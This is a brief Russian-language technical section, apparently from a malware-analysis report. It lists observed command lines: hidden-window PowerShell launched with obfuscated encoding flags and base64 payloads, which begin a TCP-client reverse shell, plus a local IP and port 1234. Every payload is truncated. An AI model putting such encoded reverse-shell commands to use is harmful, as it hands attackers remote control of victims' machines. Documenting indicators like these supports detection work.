Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) UwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABjAGwAaQBlAG4AdAAgAC0AVgBhAGwAdQBlACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG...
- '<LOCALNET>.42.50':1234
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) UwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABjAGwAaQBlAG4AdAAgAC0AVgBhAGwAdQBlACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABjAGwAaQBlAG4AdAAgAC0AVgBhAGwAdQBlACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBl...